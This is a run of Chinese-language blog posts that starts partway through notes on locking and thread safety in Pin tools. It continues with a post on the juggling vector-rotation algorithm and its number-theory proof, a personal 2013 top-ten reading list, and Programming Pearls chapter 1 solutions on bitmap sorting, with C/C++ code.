<p>Pintool在插入桩函数时不需要显式加锁,因为Pin是在获得内部的VM lock之后才执行这些函数的。然而,Pin会并行地执行分析代码和替换函数,所以如果这些函数访问全局数据,Pintool可能需要为其加锁。</p>
<p>Linux上的Pintools需要注意在分析函数或替代函数中使用C/C++标准库函数,因为链接到Pintools的C/C++标准函数不是线程安全的。一些简单C/C++函数本身是线程安全的,在调用时不需要加锁。但是,Pin没有提供一个线程安全函数的列表。如果有怀疑,需要在调用库函数的时候加锁。特别的,errno变量不是多线程安全的,使用这个变量的tool需要提供自己的锁。注意这些限制仅存在Unix平台,这些库函数在Windows上是线程安全的。</p>
<p>Pin可以在线程开始和结束的时候插入回调函数。这为Pintool提供了一个比较方便的地方分配和操作线程局部数据。</p>
<p>Pin也提供了一个分析函数的参数(IARG_THREAD_ID),用于把Pin指定的线程ID传递给分析函数。这个ID跟操作系统的线程ID不同,它是一个从0开始的小整数,可以作为线程私有数据或者用户锁的索引。</p>
<p>除了Pin线程ID,Pin API提供了高效的线程局部存储(TLS),提供了分配新的TLS key并为它关联指定析构清理函数的选项。进程中的每个线程都能够在自己的槽中存储和取得对应key的数据。新分配的key在所有线程中的初始值都是NULL。</p>
<p>False共享(伪共享)发生在多个线程访问同一条cache line的不同部分,并且其中至少有一个是写操作时。为了保持内存一致性,计算机必须在CPU之间来回传输整条cache line,即使其余数据并没有被共享。可以通过将关键数据对齐到cache line边界,或者重新排列数据结构来避免伪共享。</p>
<h4>Avoiding Deadlocks in Multi-threaded Applications</h4>
<p>因为Pin,the tool和程序可能都会要求或释放锁,Pin tool的开发者必须小心避免死锁。死锁经常发生在两个线程以不同的顺序要求同样的锁。例如,线程A要求lock L1,接着要求L2,线程B要求lock L2,接着要求L1。如果线程A得到了L1,等待L2,同时线程B得到了L2,等待L1,这就导致了死锁。为了避免死锁,Pin为必须获得的锁强加了一个层次结构。Pin在要求任何锁时会要求自己的内部锁。我们假设应用将会在这个层次结构的顶端获得锁。下面的图展示了这种结构:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Application locks -> Pin internal locks -> Tool locks
</code></pre></div></div>
<p>Pin tool开发者在设计他们自己的锁时不应该破坏这个锁层次结构。下面是基本的指导原则:</p>
<ul>
<li>
<p>如果tool在一个Pin回调中要求任何锁,它在从这个回调中返回时必须释放这些锁。从Pin内部锁看来,在Pin回调中占有一个锁违背了这个层次结构。</p>
</li>
<li>如果tool在一个分析函数中请求任何锁,它从这个分析函数中返回时必须释放这些锁。从Pin内部锁和程序自身看来,在分析函数中占有一个锁违背了这个层次结构。</li>
<li>如果tool在一个Pin回调或者分析函数中调用Pin API,它不应该在调用API的时候占有任何锁。一些Pin API使用了内部Pin锁,所以在调用这些API时占有一个tool锁违背了这个层次结构。</li>
<li>如果tool在分析函数里面调用了Pin API,它可能需要先调用PIN_LockClient()获得Pin客户锁。这取决于具体的API,需要查看特定API的说明了解更多信息。注意tool在调用PIN_LockClient()时,不能占有任何上述的其他锁。</li>
</ul>
<p>虽然上述的指导在大多数情况下已经足够,但是它们或许在某些特定的情形下显得过于严格。下面的指导解释了上述基本指导的放松情形:</p>
<ul>
<li>
<p>在JIT模式下,tool可以在分析函数中请求锁而不立即释放,直到将要离开包含这个分析函数的trace时再释放。但tool必须考虑到:当程序抛出异常时,trace可能提前退出。对于任何这样被tool占有的锁L,必须遵守以下规则:</p>
<ul>
<li>tool必须建立一个当程序抛出异常时的处理回调,这个回调会释放之前得到的锁L。可以使用PIN_AddContextChangeFunction()建立这个回调。</li>
<li>为了避免破坏这个层次结构,tool禁止在Pin回调中要求锁。</li>
</ul>
</li>
<li>
<p>如果tool从一个分析函数中调用Pin API,并且在调用API时满足下面的条件,它可以请求并继续占有一个锁L:</p>
<ul>
<li>锁L不是从任何Pin回调中请求的。这避免了违背这个层次结构。</li>
<li>被调用的Pin API不会导致程序代码被执行。这避免了违背这个层次结构。</li>
</ul>
</li>
</ul>
杂耍算法及其证明2013-12-22T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2013/12/22/zashua
<!--script type="text/javascript" src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=default"-->
<!-- mathjax config similar to math.stackexchange -->
<script src="http://cdn.mathjax.org/mathjax/latest/MathJax.js?config=TeX-AMS_HTML" type="text/javascript"></script>
<p> 这是编程珠玑上面的一个题,也是笔试中出烂了的题目。题目非常简单,描述如下:将一个n元一维向量向左旋转i个位置,例如当n=8,i=3时,向量abcdefgh旋转为defghabc。简单的代码使用一个n元的中间向量在n步内完成该工作。你能否仅使用几十个额外字节的存储空间,在正比于n的时间内完成向量的旋转?</p>
<p> 下面是最简单的一种解法。</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <cstdio>
#include <cstring>

void reverse(char *a, int beg, int end)
{
    char tmp;
    for (; beg < end; beg++, end--)
    {
        tmp = a[beg];
        a[beg] = a[end];
        a[end] = tmp;
    }
}

void LeftReverse(char *a, int n, int k)
{
    reverse(a, 0, k - 1);      /* 翻转前k个 */
    reverse(a, k, n - 1);      /* 翻转后n-k个 */
    reverse(a, 0, n - 1);      /* 整体翻转 */
}

int main()
{
    char test[] = "123abcdefg";
    LeftReverse(test, (int)strlen(test), 3);
    printf("reversed:%s\n", test);
    return 0;
}
</code></pre></div></div>
<p> 当然,今天的主题不是这个,而是书中提到的另一种解法:英文是啥给忘了,翻译成“杂耍算法”。这个算法的步骤是这样的:move x[0] to the temporary t, then move x[i] to x[0], x[2i] to x[i], and so on, until we come back to taking an element from x[0], at which point we instead take the element from t and stop the process.
If that process didn’t move all the elements , then we start over at x[1], and continue until we move all the elements.具体代码如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <cstdio>
#include <iostream>
using namespace std;

int gcd(int a, int b)
{
    while (b)
    {
        int c = a % b;
        a = b;
        b = c;
    }
    return a;       /* 原版在b为0时没有返回值,这里补上 */
}

void rotate(char *a, int n, int k)
{
    char tmp;
    int j;
    int d = gcd(n, k);          /* 外层循环恰好执行gcd(n,k)次 */
    for (int i = 0; i < d; ++i)
    {
        tmp = a[i];
        for (j = i + k; j != i; j = (j + k) % n)
        {
            a[(j - k + n) % n] = a[j];
        }
        a[(j - k + n) % n] = tmp;
    }
}

int main()
{
    char a[] = "abc12345678";
    cout << "gcd(11,3):" << gcd(11, 3) << endl;
    rotate(a, 11, 3);
    printf("after rotate:%s\n", a);
    return 0;
}
</code></pre></div></div>
<p>经过如下图所示的步骤之后,就完成了移位,此例中i=3,n=11。</p>
<p><img src="/assets/img/zacou/zacou.jpg" alt="" /></p>
<p> 这个算法会在执行\(gcd(i,n)\)次后就停止了,为什么?这就涉及到数论知识了,也就是今天的主题。</p>
<p> 数论中有这样一个结论:\(n\)个数</p>
\[0\,mod\,n,\quad i\,mod\,n,\quad 2i\,mod\,n,\quad \cdots,\quad (n-1)i\,mod\,n\quad (1)\]
<p>按照某种次序恰好组成\(\frac{n}{d}\)个数</p>
\[0,\quad d,\quad 2d,\quad \cdots,\quad n-d\quad \quad (2)\]
<p>的\(d\)份复制,其中\(d=gcd(i,n)\).例如,当\(n=12\)且\(i= 8\)时,有\(d=4\),这些数就是\(0,8,4,0,8,4,0,8,4,0,8,4\).</p>
<p> 证明(指出我们得到前面\(\frac{n}{d}\)个值的\(d\)份复制)的第一部分是显然的,根据同余式的基本理论,我们有</p>
\[ji\equiv ki(mod\,n)\Leftrightarrow j\frac{i}{d}\equiv k\frac{i}{d}(mod\,\frac{n}{d})\]
<p>可以看到当\(0\leqslant k< \frac{n}{d}\)时,我们得到的就是这\(\frac{n}{d}\)个数的\(d\)份复制,\(k\)的取值就是模数为\(\frac{n}{d}\)的最小完全非负剩余系中的数。</p>
<p> 现在证明这\(\frac{n}{d}\)个数就是\({0,d,2d,\cdots,n-d}\)(按照某种次序排列)。记\(i={i}'d,n={n}'d\)。根据mod的分配律\(c(x\,mod\,y)=(cx)\,mod\,(cy)\),就有</p>
\[ki\,mod\,n=d(k{i}'\,mod\,{n}')\]
<p>所以当\(0\leqslant k< {n}'\)时出现的那些值就是\(d\)乘以以下诸数</p>
\[0\,mod\,{n}',\quad {i}'\,mod\,{n}',\quad 2{i}'\,mod\,{n}',\quad \cdots,\quad ({n}'-1){i}'\,mod\,{n}'\]
<p>我们知道\(({i}',{n}')=1\),所以我们只需要证明\(d=1\)的情况,也就是\(i\)与\(n\)互素的情况。</p>
<p>现在我们假设\((i,n)=1\),则(1)式中的数是各不相同的。如若不然,取\(k,j\in [0,n-1],k\neq j\),假设\(ki\,mod\,n=ji\,mod\,n\),则有\(ki\equiv ji(mod\,n)\)。由于\((i,n)=1\),则\(k\equiv j(mod\,n)\),所以\(k=j\),显然矛盾。所以(1)中的数恰好就是\(0,1,2,\cdots,n-1\)。</p>
<p> 结论证完,下面回到例子简要分析,在本例中\(n=11,i=3,gcd(11,3)=1\),于是</p>
\[0,\quad 3\,mod\,11,\quad 6\,mod\,11,\quad \cdots,\quad 10\times 3\,mod\,11\]
<p>的值恰好就是模\(11\)的最小非负完全剩余系按一定顺序排列的结果。所以经过如下的步骤</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>t = x[0]
x[0] = x[i mod n]
x[i mod n] = x[2i mod n]
……
x[(n-2)*i mod n] = x[(n-1)*i mod n]
x[(n-1)*i mod n] = t
</code></pre></div></div>
<p>之后,所有的元素都到了该去的地方。</p>
<p> 当\((n,i)=d\,(d\neq 1)\)时怎么办呢?从上面的结论我们可以知道,每隔\({n}'=\frac{n}{d}\)步之后,序列会回到起点,这样我们就又遇到\(x[0]\)了。这个时候我们需要将\(x[1]\)移到\(t\),重复上述步骤,共做\(d\)轮。我们简要看看图示。</p>
<p><img src="/assets/img/zacou/12.jpg" alt="" /></p>
<p>看看图示就明了了。</p>
<p> 这是复习数论的时候遇到的一个结论,然后想起曾经的一个题。现在确实是完全清晰了。人说,数学是科学的女皇,数论是数学的女皇,数论里面充满着迷人的结论。这世间充满了美妙,我希望能够与诸君分享。</p>
2013我的私人阅读十佳2013-12-05T00:00:00+00:00http://terenceli.github.io/%E7%94%9F%E6%B4%BB/2013/12/05/booklist
<p> 微信“不止读书”的主人魏小河最近发起了“私人阅读十佳”的活动,让筒子们对这一年的阅读做一个梳理和盘点。看了几个书单,基本上每个书单都有我看过的很喜欢的书,
趁着博客刚刚搭好,自己也总结了一下。不过10本实在是太难选,太难选,好多好书都未能选上。</p>
<p><strong>1. <a href="http://book.douban.com/subject/1003479/">中国历代政治得失</a></strong></p>
<p><img src="/assets/img/booklist/1.jpg" alt="" /></p>
<p> 这是我经常向人推荐的,钱穆先生的名号想必不必多言。钱老从政治组织,选举制度,经济制度,兵役赋税制度对汉、唐、宋、明、清五朝进行了分析。真的是有理有据,很有思考性,书也薄,不到200页。其实我很喜欢钱老的风格,钱穆强调不要因为政治需要就用专制、黑暗否定,抹杀过去的一切,而是要从对历代的政制进行深刻的分析,尊重历史客观。</p>
<p><strong>2. <a href="http://book.douban.com/subject/23008971/">平如美棠</a></strong></p>
<p><img src="/assets/img/booklist/2.jpg" alt="" /></p>
<p> 这本书真的很令人感动,讲的其实只是一对平凡夫妻的事情,里面有一段话我一直都记得“对我们平凡人而言,生命中许多微细小事,并没有什么特别缘故地就在心深处留下印记,天长日久便成为弥足珍贵的回忆。”
就如很多年之前,作为一个很有理想的骚年,一味的向前,错失了很多东西,多年之后我才明白,活在当下才是最重要的,平凡真的不是一个坏事。顺说,这本书的装帧很好,很有感觉。</p>
<p><strong>3. <a href="http://book.douban.com/subject/3674537/">明朝那些事</a></strong></p>
<p><img src="/assets/img/booklist/3.jpg" alt="" /></p>
<p> 如果你因为传统教育对历史有一种小恐惧,不妨看一看这套书,小说笔法写就的历史书,有趣亦不失史实。读史真的能够让一个人的胸怀变得很广很广,几百年的兴衰荣辱看过去,你就会觉得你眼前的这些个事就都不是事。一个人真的只是历史长河中很小很小的、极其偶然的存在,你要做的就是做你自己。</p>
<p><strong>4. <a href="http://book.douban.com/subject/25709076/">洪业:清朝开国史</a></strong></p>
<p><img src="/assets/img/booklist/4.jpg" alt="" /></p>
<p> 很巧的是,这本书恰好就是从明末开始介绍到清朝建立、顺治登基这一过程的,对南明也有一些讲述,可以说是承接了《明朝那些事》后续。这本书还是比较学院,从里面的注解就能看出。其实成就任何一番事业都是不容易的,
看看从努尔哈赤到皇太极到顺治是如何成就他们的“洪业”就知道了。</p>
<p><strong>5. <a href="http://book.douban.com/subject/1283178/">追寻现代中国</a></strong></p>
<p><img src="/assets/img/booklist/5.jpg" alt="" /></p>
<p> 这本书是也是洋人研究中国历史的,还不错。据说国外对近代史的研究是从16世纪开始的,也就是从我国的明朝,这本书也是。看完本书对中国近代史会有一个大致的脉络。当然,个人觉得还是1840之后的历史更值得研究,我们是如何一步一步走到现在,都能从近代史中找出自己的思考。</p>
<p><strong>6. <a href="http://book.douban.com/subject/24307937/">东方历史评论</a></strong></p>
<p><img src="/assets/img/booklist/6.jpg" alt="" /></p>
<p> 今年出的历史杂志,至今出了三期,主编是许知远,这个人的八卦我知道的比较少,只知道本科是北大微电子的。这本杂志还是真心不错的,特别是每一期的专题。比如第一期专题是,共和的失败,探讨了清末明初的中国政治走向,读来令人一片唏嘘,忍不住掩卷沉思,如果换一种路,中国今天在何方。</p>
<p><strong>7. <a href="http://book.douban.com/subject/7060185/">江城</a></strong></p>
<p><img src="/assets/img/booklist/7.jpg" alt="" /></p>
<p> 这本书是从阿娇那里介绍过来的,海斯勒的三部曲之首,另外两本是《甲骨文》与《寻路中国》,也非常好看。本书讲的是作者在江边小城涪陵两年的教学经历。这本书文字很美,这个确实是要有些水平的。更重要的是,此书从一个外国人角度,记录了中国城市变迁的一个缩影。我觉得涪陵人民还是应该要感谢作者的,他为涪陵留下了一段历史。</p>
<p><strong>8. <a href="http://book.douban.com/subject/23116732/">国会现场</a></strong></p>
<p><img src="/assets/img/booklist/8.jpg" alt="" /></p>
<p> 这本书是讲民初实行宪政时关于国会的。近两年民国热的似乎太泛滥了,不过,民国、近代史确实有太多被误解的地方,值得学者们深入研究。孔子作春秋而乱臣贼子惧,虽然今天早已是礼崩乐坏的时代,很多人的所作所为已不可用无耻形容,但是史家自有记述。我不认同孙中山“军政、训政、宪政”,看了这本书之后,更加觉得无耻的是那些政客,只是一代人有一代人的事情,我们亦不应对他们有太多苛责。</p>
<p><strong>9. <a href="http://book.douban.com/subject/25726537/">小城故事</a></strong></p>
<p><img src="/assets/img/booklist/9.jpg" alt="" /></p>
<p> 作者是李静睿,我们四川自贡的人,跟郭敬明是一个地方的哦。她的文字让人很舒服。其实她之前是一个记者,也是一个对时局有着自己的看法与想法的人。这本书讲的是自贡小城的一些人和事,看的时候自然而然会把自己代入那种川南小城的氛围,简单而又美好,很多能让我回想到小镇的点点滴滴,那些平凡生活,那些或淡或浓的记忆 也仿佛能够看到自己以后的生活,那些注定的疏远,那些无法追溯的美好。</p>
<p><strong>10. 红太阳是怎样升起的</strong></p>
<p> 作者是已故著名学者高华教授。刘瑜貌似说过要读懂中国革命史只要《红太阳是怎样升起的》以及《牛鬼蛇神录》就好了,我觉得真心是这样的。《红》以公开出版的大量史料对延安整风的前后过程进行了深入的分析,据说让体制内能够接触到秘密史料的人都佩服他的对史实的推理。当然,这是一本禁书。</p>
<p> 本来想写几本技术书籍的,奈何今年上半年忙毕设,下半年俗务缠身,大部头的书很多都没有看完,大概有2本书个人觉得还可以的,一本是《APUE》,还有一本是《虚拟机:系统与进程的通用平台》。还有一点想要提及的是这里面不少大部头都是用kindle看的,感觉真是不错,读书神器。</p>
【编程珠玑】第一章2013-12-04T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2013/12/04/programming-pearls
<p>问题:一个文件最多有n(n=1000w)个正整数,每一个正整数都小于n,并且它们是不重复的,如何使用一种快速的方法给这些正整数排序。要求内存最多是1M。</p>
<p>方法一:使用归并排序,归并排序的时间复杂度是nlgn。但是归并排序需要将数据一次全部读入内存,很明显需要的内存空间是1000w*4/(1024*1024),大约是40M,占用空间太大。</p>
<p>方法二:可以将这些正整数分成40组,分别是[0–249999]、[250000–499999]….[9750000–9999999],然后遍历40次这些整数,第一次找出[0–249999]里面的,第二次找出[250000–499999]里面的。这样每次处理的是250000个数,内存上符合要求,但是时间太多,更何况I/O操作相当费时。</p>
<p>方法三:就是这一章的主题了,位图排序。其基本思想是用1个bit来表示[0,n)中的一个数是否存在,如果存在这个bit置为1,否则置0。全部置位之后,再顺序遍历一遍,就排好序了,这样使用的空间大致是n/(8*1024*1024)M,1000w大致就是1.25M。例如对于集合{1,2,3,5,8,13},都小于20,假设我们有20个bit,则它的位图表示就是01110100100001000000,再一遍历,就排好了。这种方法的伪代码表示如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>for i = [0,n)
bit[i] = 0
for each i in the input file
bit[i] = 1
for i = [0,n)
if bit[i] == 1
write i on the output file
</code></pre></div></div>
<p>实际的代码如下:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* Copyright (C) 1999 Lucent Technologies */
/* From 'Programming Pearls' by Jon Bentley */
/* bitsort.c -- bitmap sort from Column 1
* Sort distinct integers in the range [0..N-1]
*/
#include <stdio.h>
#define BITSPERWORD 32
#define SHIFT 5
#define MASK 0x1F
#define N 10000000
int a[1 + N/BITSPERWORD];
void set(int i) { a[i>>SHIFT] |= (1<<(i & MASK)); }
void clr(int i) { a[i>>SHIFT] &= ~(1<<(i & MASK)); }
int test(int i){ return a[i>>SHIFT] & (1<<(i & MASK)); }
int main()
{
int i;
for (i = 0; i < N; i++)
clr(i);
/* Replace above 2 lines with below 3 for word-parallel init
int top = 1 + N/BITSPERWORD;
for (i = 0; i < top; i++)
a[i] = 0;
*/
while (scanf("%d", &i) != EOF)
set(i);
for (i = 0; i < N; i++)
if (test(i))
printf("%d\n", i);
return 0;
}
</code></pre></div></div>
<p>代码没有什么说的,就是需要注意一下别人对位图的位操作是比较巧妙的。</p>
<p>1.输入的数需要有一个范围</p>
<p>2.输入的数应该是没有重复的,如果重复次数不超过m次,那么可以用lgm个bit来表示1个数</p>
<p><strong>课后问题:</strong></p>
<p>1. 使用库函数排序</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>C语言
/* Copyright (C) 1999 Lucent Technologies */
/* From 'Programming Pearls' by Jon Bentley */
/* qsortints.c -- Sort input set of integers using qsort */
#include <stdio.h>
#include <stdlib.h>
int intcomp(const void *x, const void *y)
{
    return *(const int *)x - *(const int *)y;
}
int a[1000000];
int main()
{
int i, n=0;
while (scanf("%d", &a[n]) != EOF)
n++;
qsort(a, n, sizeof(int), intcomp);
for (i = 0; i < n; i++)
printf("%d\n", a[i]);
return 0;
}
C++语言
/* Copyright (C) 1999 Lucent Technologies *//* From 'Programming Pearls' by Jon Bentley */
/* sortints.cpp -- Sort input set of integers using STL set */
#include <iostream>
#include <set>
using namespace std;
int main()
{
set<int> S;
int i;
set<int>::iterator j;
while (cin >> i)
S.insert(i);
for (j = S.begin(); j != S.end(); ++j)
cout << *j << "\n";
return 0;
}
</code></pre></div></div>
<p>2. 位操作</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#define BITSPERWORD 32
#define SHIFT 5
#define MASK 0x1F
#define N 10000000
int a[1 + N/BITSPERWORD];
void set(int i) { a[i>>SHIFT] |= (1<<(i & MASK)); }
void clr(int i) { a[i>>SHIFT] &= ~(1<<(i & MASK)); }
int test(int i){ return a[i>>SHIFT] & (1<<(i & MASK)); }
</code></pre></div></div>
<p>3. 位图排序与系统排序 位图排序最快,qsort比stl sort快</p>
<p>4. 随机生成[0,n)之间不重复的随机数</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/* Copyright (C) 1999 Lucent Technologies */
/* From 'Programming Pearls' by Jon Bentley */
/* bitsortgen.c -- gen $1 distinct integers from U[0,$2) */
#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#define MAXN 2000000
int x[MAXN];
int randint(int a, int b)
{
return a + (int)(((long long)RAND_MAX * rand() + rand()) % (b + 1 - a));
}
int main(int argc, char *argv[])
{
int i, k, n, t, p;
srand((unsigned) time(NULL));
k = atoi(argv[1]);
n = atoi(argv[2]);
for (i = 0; i < n; i++)
x[i] = i;
for (i = 0; i < k; i++) {
p = randint(i, n-1);
t = x[p]; x[p] = x[i]; x[i] = t;
printf("%d\n", x[i]);
}
return 0;
}
</code></pre></div></div>
<p>5. 最开始实现的需要1.25M,如果内存1M是严格限制的,应该分两次读取,第一次读取0到4999999之间的数,第二次读取5000000到9999999之间的数,这样每次需要的内存空间约是0.625M。下面给出july博客中的一个实现:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <iostream>
#include <ctime>
#include <bitset>
using namespace std;
const int max_each_scan = 5000000;
int main()
{
clock_t begin = clock();
bitset<max_each_scan + 1> bitmap;
bitmap.reset();
FILE* fp_unsorted_file = fopen("data.txt","r");
int num;
while(fscanf(fp_unsorted_file,"%d ",&num) != EOF)
{
if (num < max_each_scan)
{
bitmap.set(num,1);
}
}
FILE* fp_sort_file = fopen("sort.txt","w");
for (int i = 0; i < max_each_scan; ++i)
{
if (bitmap[i] == 1)
{
fprintf(fp_sort_file,"%d ",i);
}
}
int result = fseek(fp_unsorted_file,0,SEEK_SET);
if (result)
{
printf("fseek failed\n");
}
else
{
bitmap.reset();
while(fscanf(fp_unsorted_file,"%d ",&num) != EOF)
{
if (num >= max_each_scan && num < 10000000)
{
num -= max_each_scan;
bitmap.set(num,1);
}
}
for (int i = 0; i < max_each_scan; ++i)
{
if (bitmap[i] == 1)
{
fprintf(fp_sort_file, "%d ",i + max_each_scan );
}
}
}
clock_t end = clock();
cout << "位图耗时:" << (end - begin) / CLOCKS_PER_SEC << "s" << endl;
return 0;
}
</code></pre></div></div>
<p>6. 如果每个数据最多出现10次,那么需要4个bit来记录一个数。视内存情况决定使用单次或者多路排序。</p>
<p>7. 程序输入的安全性检验:每个数出现不应超过一次,并且不应该小于0或者大于等于n。</p>
<p>8. 如果免费电话号码有800、878、888等前缀,如何查看一个号码是否是免费号码。暂时只想到跟本章思想一样的方法:为每种前缀各建一个位图,有n种前缀就耗内存1.25M*n。</p>
<p>9. 避免初始化问题 网上google才理解了答案的意思。具体操作是声明两个数组from to以及一个变量top=0;</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (from[i] < top && to[from[i]] == i)
{
    printf("already initialized!\n");
}
else
{
    data[i] = 1;      /* 首次访问,在这里做真正的初始化 */
    from[i] = top;
    to[top] = i;
    top++;
}
</code></pre></div></div>
<p>top变量用来记录已经初始化过的元素个数,from[i]=top相当于记录a[i]是第几个被初始化的元素,to[top]=i用来指明第top个被初始化的元素在data里的下标是多少。因此每次访问一个data元素时,先判断from[i] < top,即data[i]元素是否被初始化过。但当top很大时,from[i]里被内存随便赋予的初始值可能恰好小于top,这时候我们还需要to[from[i]] == i的判断,来保证from[i] < top不是因为内存随意赋给from[i]的值碰巧小于top,而是真正初始化之后才小于top的。这个还是要自己理解。</p>
<p>10. 使用电话号码最后两位作为客户的哈希索引,进行分类。</p>